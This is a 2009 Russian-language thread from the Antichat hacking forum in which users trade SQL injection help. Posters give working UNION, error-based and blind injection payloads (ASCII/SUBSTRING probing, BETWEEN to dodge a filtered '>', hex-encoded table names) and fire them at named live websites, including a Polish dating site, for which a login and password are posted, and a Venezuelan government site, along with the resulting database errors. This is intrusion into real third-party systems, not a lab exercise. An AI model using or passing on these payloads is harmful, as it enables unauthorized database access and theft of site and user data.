26.09.2009, 16:57
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
По логике < >,а потом сравнением и смотрим по ascii табле символ
forum.antichat.ru/thread119047.html
|
|
|
26.09.2009, 18:23
|
|
Новичок
Регистрация: 25.09.2009
Сообщений: 2
С нами:
8750731
Репутация:
0
|
|
Помогите разобраться с MSSQL injection
Имеем:
SQL
?id=496'
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES--
Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,1+FROM+I NFORMATION_SCHEMA.TABLES--
Microsoft OLE DB Provider for SQL Server error '80040e07'
Operand type clash: ntext is incompatible with int
SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a'+FROM +INFORMATION_SCHEMA.TABLES--
Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
добавляем поля пока эта ошибка не пропадет...
SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a',1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+INFORMATIO N_SCHEMA.TABLES--
ошибок не дает, но и ничего и не выводит
Подскажите пожалуйста куда дальше рыть, или может я уже где-то туплю?
|
|
|
|
26.09.2009, 18:24
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
0o
Незадумывался : (....
|
|
|
|
26.09.2009, 18:36
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
bumerok
рыть лучше вот сюда:
https://forum.antichat.ru/thread30501.html
А если нужен конкретный ответ по конкретной скуле, то давай линк, гадание на операторах и конструкциях в теме ни к чему.
|
|
|
|
26.09.2009, 20:17
|
|
Новичок
Регистрация: 25.09.2009
Сообщений: 2
С нами:
8750731
Репутация:
0
|
|
jokester
вот линк
тока нужно залогинится
log: bugsrc
pas: qwer1234
http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496'
+ почему-то из ie8 http 500, a из под ff 3.0.14 нормально
выводит ошибку
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
|
|
|
|
26.09.2009, 20:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
bumerok, юзай подзапросы
http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496+or+1=(select+to p+1+table_name+from+information_schema.tables);--
|
|
|
|
27.09.2009, 19:32
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?
ps
%3E
Неработает  |
|
|
|
27.09.2009, 20:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от Ctacok
Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?
Ну например заюзать between
1' and 1=if(ascii(substring(user(),1,1)) between 0 and 150,1,0)--+
Сообщение от Byrger
Допустим login=0x73716C696E6A666C6432 Ничего не выдаёт
А ты уверен, что что-то должно выдавать именно на этот логин? =)
Перевести название таблицы/колонки в hex или в CHAR, кому как нравится
Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем):
union+select+1,table_rows+from+information_schema. tables+where+table_name=0x7573657273
Некоторые индивидумы умудряются загонять в хекс или чар вместе с кавычками, тоесть так 'users'=27757365727327, так делать ненадо, база этого не оценит )
Какбэ и все
|
|
|
|
27.09.2009, 20:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Ctacok
Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?
ps
%3E
Неработает дык делать просто "=" и пройтись по всем нужным ASCII
|
|
|
|
27.09.2009, 19:41
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
С нами:
9963746
Репутация:
180
|
|
Можете кто нить разжевать в чем проблема.
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10+fro m+INFORMATION_SCHEMA.tables+limit+6,1--
Вывод дает PROFILING (я так понял это имя таблици), делаю дальше
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=PRO FILING+limit+0,1--
и мне выдает ошибку
Database error: Invalid SQL: SELECT * FROM noticias where id_noticia = -321 UNION SELECT 1,COLUMN_NAME,3,4,5,6,7,8,9,10 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=PROFILING limit 0,1--
MySQL Error: 1054 (Unknown column 'PROFILING' in 'where clause')
Session halted.
че за херня ?( |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
